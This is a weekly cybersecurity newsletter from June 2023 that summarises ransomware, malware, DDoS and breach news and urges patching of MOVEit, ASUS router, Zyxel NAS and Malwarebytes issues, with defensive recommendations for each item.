CyberWatch - June 21, 2023

At a Glance

Ransomware, Malware & Phishing

1. Fake Researcher Profiles Spread Malware through GitHub Repositories as PoC Exploits
2. Microsoft Warns of New Russian State-Sponsored Hacker Group with Destructive Intent
3. Over 100,000 ChatGPT accounts stolen via info-stealing malware
4. Microsoft Blames Massive DDoS Attack for Azure, Outlook, and OneDrive Disruptions
5. Reddit hackers threaten to leak data stolen in February breach
6. Researchers Discover New Sophisticated Toolkit Targeting Apple macOS Systems
7. Vidar Malware Using New Tactics to Evade Detection and Anonymize Activities
8. LockBit Ransomware Extorts $91 Million from U.S. Companies

Vulnerabilities

1. MOVEit Customers Urged to Patch Third Critical Vulnerability
2. Malwarebytes issues fix for Chrome broken by Windows 11 KB5027231
3. ASUS Patches Highly Critical WiFi Router Flaws
4. Zyxel Releases Urgent Security Updates for Critical Vulnerability in NAS Devices

Ransomware, Malware & Phishing

Fake Researcher Profiles Spread Malware through GitHub Repositories as PoC Exploits

Analysis: A recent discovery has revealed the presence of a group of impostor researchers utilizing GitHub to distribute malicious repositories containing alleged proof-of-concept exploits for zero-day vulnerabilities.

The fraudulent cybersecurity company behind this scheme, known as High Sierra Cyber Security, created numerous fake GitHub accounts and Twitter profiles to lend credibility to their activities. In an attempt to appear legitimate, they even incorporated headshots of genuine security researchers from reputable organizations.

The repositories hosted on GitHub consist of Python scripts that, when executed, download and run malicious binaries on Windows and Linux systems. Notably, the targeted software includes Discord, Google Chrome, and Microsoft Exchange Server.

The fraudulent campaign was first identified in early May and, at present, the repositories remain accessible. Specific indicators of compromise associated with the attack have not been disclosed in the available information at this time. Consequently, users are advised to exercise caution when downloading code from open-source repositories. A thorough review of the code and validation of its authenticity are essential prior to execution. This incident serves as a poignant reminder to remain vigilant regarding potential security risks when dealing with code obtained from untrusted sources.

In light of these findings, Access Point recommends implementing stringent security measures to safeguard against such threats. This includes conducting rigorous code reviews, utilizing trusted repositories whenever possible, and employing robust security solutions capable of detecting and mitigating malicious activities. Additionally, organizations should prioritize ongoing user education and awareness initiatives to ensure that employees are well-informed about the risks associated with downloading and executing code from unverified sources.

By adopting a proactive approach and adhering to these recommendations, individuals and businesses can fortify their defenses against potential cyber threats.

Microsoft Warns of New Russian State-Sponsored Hacker Group with Destructive Intent

Analysis: Microsoft has issued a warning about a newly identified Russian state-sponsored hacker group named Cadet Blizzard, believed to be linked to the General Staff Main Intelligence Directorate (GRU).

Although Cadet Blizzard has a lower success rate compared to other advanced Russian groups, it exhibits a distinct approach that poses a potential threat. The group has been active since at least 2020 and was first identified by Microsoft in January 2022.

Cadet Blizzard engages in disruptive, destructive, and information collection activities, often carried out in a haphazard manner. It has been seen targeting numerous different sectors including government agencies, law enforcement, non-profit organizations, IT service providers, and emergency services.

While primarily focused on entities in Ukraine, Europe, Central Asia, and periodically Latin America, Cadet Blizzard also targets NATO member states involved in providing military aid to Ukraine. The group has been associated with destructive attacks, espionage, and information operations. Notably, Cadet Blizzard exhibits lower operational security compared to more established Russian groups, operating during off-business hours to minimize detection and defacing Ukrainian organization websites. They are also associated with the hack-and-leak forum "Free Civilian."

Access Point advises organizations – especially governments and IT service providers involved in the Ukraine conflict – to be vigilant against the increasing risk posed by Cadet Blizzard. Implementing security controls such as regular patching and updates, network segmentation, and hardened credentials can help mitigate the risk of their attacks. Organizations should also stay informed about the latest threat intelligence, actively monitoring for any signs of Cadet Blizzard's activity. Although no specific indicators of compromise have been provided at this time, it is crucial for organizations to remain proactive by maintaining a threat intelligence team who are continuously working to stay updated on trending threats and news, while actively hunting within their network for any indicators of compromise that may have evaded detection by existing security systems.

Over 100,000 ChatGPT accounts stolen via info-stealing malware

Analysis: A recent investigation has revealed that over 100,000 user accounts on the ChatGPT platform have been compromised by information-stealing malware over the course of the past year.

Dark web marketplace data shows that May 2023 saw a peak in the theft of ChatGPT credential pairs. Cyber threat intelligence firm Group-IB discovered a significant number of info-stealer logs containing ChatGPT account credentials on underground websites. The highest number of compromised accounts was found in the Asia-Pacific region, closely followed by Europe.

The attackers employed several different techniques from the MITRE ATT&CK framework (a framework that educates people on the techniques, and tactics used by attackers, and how best to defend against them) to carry out their malicious activities. The techniques seen in this attack were: Initial Access, Data from Local System, Credential Dumping, Screen Capture, and Keylogging. Information stealers specifically targeted various applications, including web browsers and email clients, to extract sensitive account data.

This breach poses significant risks, as compromised ChatGPT accounts potentially grant access to proprietary information, internal strategies, and personal communications. Consequently, some companies, such as Samsung, have prohibited the use of ChatGPT on work computers due to security concerns.

To address this alarming situation, Access Point recommends several actions for ChatGPT users and organizations. Users should consider disabling the chat saving feature in the platform's settings or manually deleting conversations containing sensitive information. It is also crucial for organizations to proactively search the web for any potentially leaked credentials from this breach, especially if users have utilized their business credentials for their ChatGPT accounts. It is important to note that information-stealing malware can also capture screenshots or perform keylogging, potentially leading to further data leaks.

Organizations dealing with highly sensitive information should prioritize the use of locally built and self-hosted tools rather than relying solely on cloud-based services. Robust security measures should be implemented, including regular updates, antivirus software, and comprehensive employee training on recognizing and avoiding malware threats.

To enhance protection, constant monitoring of systems for indicators of compromise, maintaining backups, and establishing and testing an incident response plan are essential strategies to mitigate the impact of potential data breaches.

Microsoft Blames Massive DDoS Attack for Azure, Outlook, and OneDrive Disruptions

Analysis: Microsoft recently experienced significant disruptions to its Azure, Outlook, and OneDrive services, which the company attributes to a large-scale Distributed Denial of Service (DDoS) attack.

The attack was carried out by an unidentified threat actor group called Storm-1359. This group utilized various techniques, including the use of virtual private servers (VPS), rented cloud infrastructure, open proxies, and DDoS tools. Microsoft officially acknowledged Storm-1359's involvement in a recent post.

The attack primarily employed Layer 7 DDoS techniques, such as HTTP(S) floods, cache bypass attempts, and the Slowloris technique. Although no evidence of customer data compromise has been found, the service availability of the affected Microsoft platforms was temporarily impacted.

Storm-1359 is described as a disruptive and publicity-focused group, considered a "murky upstart." Although Anonymous Sudan claimed responsibility for the attacks, no direct link to Storm-1359 has been established.

This incident serves as a reminder that no organization is immune to the threat of cyberattacks. To mitigate DDoS attacks, organizations should implement robust network infrastructure and traffic analysis tools. Measures such as rate limiting, anomaly detection, and caching mechanisms can help minimize the impact of HTTP(S) flood attacks. Regular monitoring and analysis of network traffic are crucial for detecting and blocking DDoS attacks promptly. Collaborating with trusted security partners and sharing threat intelligence can also strengthen defense against threat actors like Storm-1359.

In conclusion, the recent DDoS attack on Microsoft's Azure, Outlook, and OneDrive services was attributed to the Storm-1359 threat actor group. While no evidence of data compromise has been found, the attack caused temporary service disruptions. Organizations must prioritize DDoS mitigation by implementing appropriate measures such as ensuring a robust network infrastructure, traffic analysis tools (ex. Dynatrace), and mechanisms to counter HTTP(S) flood attacks. Regular monitoring, analysis, and collaboration with trusted security partners are essential for bolstering defense against such threats.

Reddit hackers threaten to leak data stolen in February breach

Analysis: The BlackCat (ALPHV) ransomware gang has claimed responsibility for a cyberattack on Reddit that occurred in February. During the attack, the gang successfully stole internal documents, source code, and employee data. The gang made ransom demands on April 13th and June 16th, attempting to extort Reddit for a payment.

The attack was initiated through a phishing attack on a Reddit employee. The BlackCat gang leveraged this entry point to gain access to Reddit's systems. In addition to the theft of internal documents, source code, and employee data, they also obtained limited information about the company's advertisers. To coerce Reddit into paying a ransom of $4.5 million, the gang threatened to leak the stolen data if their demands were not met.

The MITRE ATT&CK techniques associated with this attack include Phishing, Exploit Public-Facing Application, External Remote Services, Archive Collected Data, and Data from Local System. This suggests a multifaceted approach to the attack, employing various methods to infiltrate and exfiltrate data from Reddit's systems.

Access Point recommends that organizations take the following measures to mitigate the risks posed by such attacks:

• Prioritize employee education regarding the dangers of phishing attacks.
• Implement robust email security measures to detect and prevent phishing attempts.
• Employ multi-factor authentication (MFA) to enhance security and protect against unauthorized access.
• Regularly back up critical data and store backups in offline or off-site locations.
• Implement strong access controls and network segmentation to limit the impact of potential breaches.

Additionally, it is important for organizations to stay informed about emerging threats and collaborate with cybersecurity vendors and trusted sources to enhance their defense against ransomware attacks. By following these recommendations, organizations can strengthen their security posture and minimize the vulnerabilities associated with ransomware attacks.

For more information on security awareness training, check out the Access Point Resource Center.

Researchers Discover New Sophisticated Toolkit Targeting Apple macOS Systems

Analysis: Researchers from Bitdefender have discovered a new toolkit designed to target Apple macOS systems.

The malicious artifacts include JokerSpy, a Python-based backdoor, and a Swift-based FAT binary called xcc. The earliest sample of this toolkit dates back to April 18, 2023, and the discovery was recently announced in a preliminary report. The attack techniques identified by MITRE ATT&CK (framework mentioned above) include Execution, Command and Scripting Interpreter, Exfiltration Over Alternative Protocol, and Data Encoding.

The JokerSpy backdoors are capable of targeting Windows, Linux, and macOS systems. They have functionalities such as gathering system information, executing commands, downloading and executing files, as well as establishing communication with remote servers. Additionally, another malicious artifact called "sh.py" possesses extensive capabilities for system metadata gathering, file enumeration, command execution, and data exfiltration. The xcc binary, although missing some files, is believed to be part of a more complex attack, indicating a larger campaign may be in progress.

To protect against these threats, Access Point recommends that organizations using Apple macOS ensure their systems are updated with the latest security patches. It is crucial to implement robust security measures like endpoint protection and monitoring to detect and mitigate potential threats.

Regularly educating users about social engineering and spear-phishing tactics is essential to enhance your overall security posture. Additionally, collaborating with trusted cybersecurity vendors and sharing threat intelligence can contribute to a proactive defense against sophisticated attacks targeting macOS systems.

Vidar Malware Using New Tactics to Evade Detection and Anonymize Activities

Analysis: The threat actors behind the Vidar malware have recently implemented new tactics to evade detection and anonymize their activities. These changes include modifying their backend infrastructure, rotating their IP addresses, and utilizing VPN servers to conceal their operations. The modifications to the backend infrastructure, including IP address updates and the adoption of VPN servers, were observed starting from March 2023.

The Vidar malware is a commercial information stealer that has been active since late 2018. It is distributed through various methods, including phishing campaigns, cracked software sites, rogue Google Ads, and the Bumblebee malware loader. The threat actors have taken steps to conceal their online trail by rotating their IP addresses and favoring providers in Moldova and Russia. They have also divided their infrastructure into two parts and implemented authentication measures for accessing files. Furthermore, the use of VPN servers has allowed them to hide their management activities and anonymize their operations. These recent changes indicate an effort to respond to public disclosures about their activities and make it more difficult for security teams to track their actions.

To protect against Vidar and similar threats, Access Point recommends that organizations remain vigilant against phishing campaigns and educate their employees about the risks associated with downloading cracked software and clicking on suspicious ads.

Deploying robust email filtering systems and implementing multi-factor authentication can help mitigate the risk of initial access through phishing attempts. It is also crucial to monitor and analyze network traffic regularly to detect and block connections to known malicious infrastructure. Staying informed about emerging threat intelligence and sharing indicators of compromise with trusted security partners can further enhance defense against threats like Vidar.

LockBit Ransomware Extorts $91 Million from U.S. Companies

Analysis: LockBit’s ransomware-as-a-service (RaaS) has successfully extorted $91 million from various U.S. organizations through hundreds of attacks since 2020. The attacks have been ongoing for an unspecified period.

Operating as a RaaS scheme, LockBit attracts affiliates to carry out ransomware attacks. Due to its decentralized nature, a wide range of attack methods and targets are employed by a large network of unconnected threat actors. LockBit has targeted critical infrastructure sectors, including finance, food and agriculture, education, energy, government, healthcare, manufacturing, and transportation.

LockBit has undergone three significant upgrades: LockBit Red in June 2021, LockBit Black in March 2022, and LockBit Green in January 2023. LockBit Green, based on leaked source code from the now-disbanded Conti gang, demonstrates the evolving nature of the ransomware strain.

Notably, LockBit has adapted to target Linux, VMware ESXi, and Apple macOS systems. The business model involves core developers renting out the ransomware to affiliates who carry out the actual deployment and extortion. Additionally, LockBit was the first to introduce a bug bounty program and incentivize individuals to get tattoos of its insignia.

To defend against LockBit ransomware attacks, Access Point recommends implementing robust cybersecurity measures. These include regular system patching, network segmentation, user awareness training, and strong access controls. Maintaining up-to-date backups and testing their effectiveness for swift recovery in the event of an attack is crucial.

It is also important to stay informed about emerging threat intelligence and collaborate with law enforcement agencies and cybersecurity experts to enhance defense against ransomware threats. Although no specific indicators of compromise are provided, organizations should prioritize staying updated on relevant vulnerabilities and applying necessary security patches to safeguard their systems.

In addition, it is recommended that organizations establish an incident response plan specifically tailored to ransomware incidents. This plan should include procedures for isolating infected systems, engaging law enforcement if necessary, and securely recovering from backups. Regular tabletop exercises and simulations can help validate the effectiveness of the incident response plan and ensure a swift and coordinated response in case of an attack.

Vulnerabilities

MOVEit Customers Urged to Patch Third Critical Vulnerability

Analysis: Progress Software has issued a warning to its MOVEit customers, urging them to apply patches for a third critical vulnerability in the file transfer software. Tracked as CVE-2023-35708, the vulnerability is an SQL injection flaw that could enable an attacker without authentication to escalate privileges and gain access to the MOVEit Transfer database. The bug affects several versions of MOVEit Transfer released before 2023.0.3 (15.0.3). Proof-of-concept code targeting the vulnerability was made public on June 15, prompting a swift response from Progress. This marks the third critical SQL injection flaw patched by Progress in its MOVEit products in the span of three weeks, following the disclosure of a zero-day vulnerability on May 31 and another critical bug patched a week later.

The first vulnerability, identified as CVE-2023-34362, began being exploited in late May, with evidence suggesting that attacks may have started two years ago. The recent campaign targeting the MOVEit zero-day has impacted over 100 organizations, including government entities, transportation departments, airlines, and educational institutions. The Cl0p ransomware gang has been attributed to the attacks and has publicly disclosed some of the victims. The second vulnerability, CVE-2023-35036, was disclosed on June 9 but has not been observed in active exploitation. While there is no evidence of CVE-2023-35708 being exploited, Progress emphasizes the importance of applying the latest patches promptly.

To safeguard the MOVEit Transfer environment, customers are advised to disable HTTP and HTTPS traffic, allowing only localhost access, before applying the available patches. Once the patches, including the June 15th patch that addresses the previous vulnerabilities, have been applied, customers can re-enable HTTP and HTTPS traffic. Progress has made DLL drop-in patches and full MOVEit Transfer installers available to resolve the vulnerabilities, and detailed instructions for applying the patches can be found in the company's advisory.

Access Point recommends that MOVEit Transfer customers apply the available patches provided by Progress Software to address the vulnerabilities, including the latest patch released on June 15th that resolves previous security issues. Next, disable HTTP and HTTPS traffic to prevent unauthorized access, allowing only localhost access during the patching process. Once the patches have been successfully applied, customers should re-enable HTTP and HTTPS traffic to restore normal functionality. It is crucial for MOVEit Transfer customers to promptly follow these steps to enhance the security of their installations and mitigate the potential risks posed by the critical vulnerabilities.

Malwarebytes issues fix for Chrome broken by Windows 11 KB5027231

Analysis: Malwarebytes, a known cybersecurity software & Anti-Malware software, has released a fix for a known issue breaking Google Chrome on its customers’ systems in response to the installation of Windows 11 22H2 KB5027231. This issue caused the User Interface of Google Chrome to no longer display. This was found out to be a result of Malwarebytes’ anti-exploit module which would block the web browser from loading or crashing after installing KB5027231.

It was advised by Malwarebytes to toggle chrome off of the protected applications list in their Malwarebytes product as a temporary workaround. This fix which was applied in Component version: 1.0.2047 and Malwarebytes version: 4.5.31.270 will allow chrome to be added to the protected applications list for all Windows 11 devices and remediate the user interface problem. The process to update the program is automatic, but a manual check is possible by going to Settings > About > Check for updates. To re-enable chrome as a protected application after this update was applied you must open Malwarebytes, select the “Settings” wheel, click the “Security” tab, select “Manage protected applications” under Exploit protection. From there you can toggle on Google Chrome.

KB5027231 was also reported to affect systems protected by other various antivirus solutions such as Cisco and WatchGuard EDR. Please check for updates on your system whenever possible for any broken software or vulnerabilities.

Access Point recommends that users of Malwarebytes update to the latest version through the instructions above and be sure to re-enable Chrome as a protected application if you have already applied the workaround. Applying this update will allow access to Chrome and let Malwarebytes protect the browser from any threats it is capable of stopping.

ASUS Patches Highly Critical WiFi Router Flaws

Analysis: ASUS, a well-known manufacturer of Endpoint and Networking hardware has released urgent firmware updates along with a security advisory to address nine vulnerabilities associated with its Wi-Fi router products lines. They have warned users of potential remote code execution attacks.

The affected Wi-Fi routers related to the vulnerabilities are Asus GT6, GT-AXE16000, GT-AX11000 PRO, GT-AX6000, GT-AX11000, GS-AX5400, GS-AX3000, XT9, XT8, XT8 V2, RT-AX86U PRO, RT-AX86U, RT-AX86S, RT-AX82U, RT-AX58U, RT-AX3000, TUF-AX6000 and TUF-AX5400.

The vulnerabilities associated with these fixes are:

• CVE-2018-1160 (CVSS score: 9.8) - An older vulnerability from 2018 which abused Netatalk versions before 3.1.12. It was an out-of-bounds write vulnerability which allowed a remote unauthenticated attacker to achieve arbitrary code execution.
• CVE-2022-26376 (CVSS score: 9.8) - A memory corruption vulnerability which was in a functionality of ASUSWRT prior to version 3.0.0.4.386_48706 and ASUSWRT-Merlin New Gen prior to version 387.7. It allowed for a specifically-crafted HTTP request to cause a memory corruption. An attacker must send a network request to trigger this vulnerability.
• CVE-2022-35401 (CVSS score: 8.1) - An authentication bypass vulnerability that could permit an attacker to send malicious HTTP requests to gain full administrative access to the device.
• CVE-2022-38105 (CVSS score: 7.5) - An information disclosure vulnerability that could be exploited to access sensitive information by sending specially-crafted network packets.
• CVE-2022-38393 (CVSS score: 7.5) - A denial-of-service (DoS) vulnerability that could be triggered by sending a specially-crafted network packet.
• CVE-2022-46871 (CVSS score: 8.8) - The use of an out-of-date libusrsctp library that could open targeted devices to other attacks.
• CVE-2023-28702 (CVSS score: 8.8) - A command injection flaw that could be exploited by a local attacker to execute arbitrary system commands, disrupt system, or terminate service.
• CVE-2023-28703 (CVSS score: 7.2) - A stack-based buffer overflow vulnerability that could be exploited by an attacker with admin privileges to execute arbitrary system commands, disrupt system, or terminate service.
• CVE-2023-31195 (CVSS score: N/A) - An adversary-in-the-middle (AitM) flaw that could lead to a hijack of a user's session.

Installing new firmware is an arduous process which could potentially damage the hardware. In the case a user would not want to install this new firmware ASUS recommends disabling services accessible from the WAN side which includes remote access from WAN, port forwarding, DDNS, VPN server DMZ, and port trigger. They also advise to periodically audit both your equipment and security procedures which can help with detection of malware or discrepancies.

Access Point recommends that any users with the Wi-Fi routers associated with this firmware update should upgrade. Even though upgrading firmware can be daunting with the possibility of failure there are many critical remediations and fixes within this firmware upgrade. There is an FAQ linked which provides step-by-step instructions on how to upgrade your ASUS router to the latest version. As always, upgrading the versions of your programs or firmware will always have a top priority when it comes to ensuring a secure environment.

Zyxel Releases Urgent Security Updates for Critical Vulnerability in NAS Devices

Analysis: Zyxel, an IT Networking solutions provider has provided security updates to address a critical security flaw in it’s network-attached storage (NAS) devices. Zyxel has warned that the vulnerability associated, CVE-2023-27992, could result in an attacker executing arbitrary commands on affected systems.

The devices affected by this vulnerability and the affected versions are:

• NAS326 V5.21(AAZF.13)C0 and earlier
• NAS540 V5.21(AATB.10)C0 and earlier
• NAS542 V5.21(ABAG.10)C0 and earlier

CVE-2023-27992 (CVSS Score: 9.8) has to do with pre-authentication command injection which can allow an unauthenticated attacker to execute some operating system commands remotely by sending a specifically crafted HTTP request.

With Zyxel devices becoming a commonplace attack vector Access Point recommends upgrading these devices to the latest version to remediate CVE-2023-27992. Zyxel firewalls especially have been under attack by threat actors with multiple Zyxel products appearing on CISA’s exploited vulnerabilities catalog. Organizations should be aware of firmware updates and upgrade the versions of their firmware whenever feasible to help mitigate risk to their network

Sources

https://thehackernews.com/2023/06/fake-researcher-profiles-spread-malware.html

https://thehackernews.com/2023/06/microsoft-warns-of-new-russian-state.html

https://www.bleepingcomputer.com/news/security/infostealer-malware-have-stolen-101-000-chatgpt-accounts/

https://thehackernews.com/2023/06/microsoft-blames-massive-ddos-attack.html

https://thehackernews.com/2023/06/researchers-discover-new-sophisticated.html

https://www.bleepingcomputer.com/news/security/reddit-hackers-threaten-to-leak-data-stolen-in-february-breach/

https://thehackernews.com/2023/06/vidar-malware-using-new-tactics-to.html

https://thehackernews.com/2023/06/lockbit-ransomware-extorts-91-million.html

https://www.securityweek.com/moveit-customers-urged-to-patch-third-critical-vulnerability/

https://www.bleepingcomputer.com/news/microsoft/malwarebytes-issues-fix-for-chrome-broken-by-windows-11-kb5027231/

https://www.securityweek.com/asus-patches-highly-critical-wifi-router-flaws/

https://thehackernews.com/2023/06/zyxel-releases-urgent-security-updates.html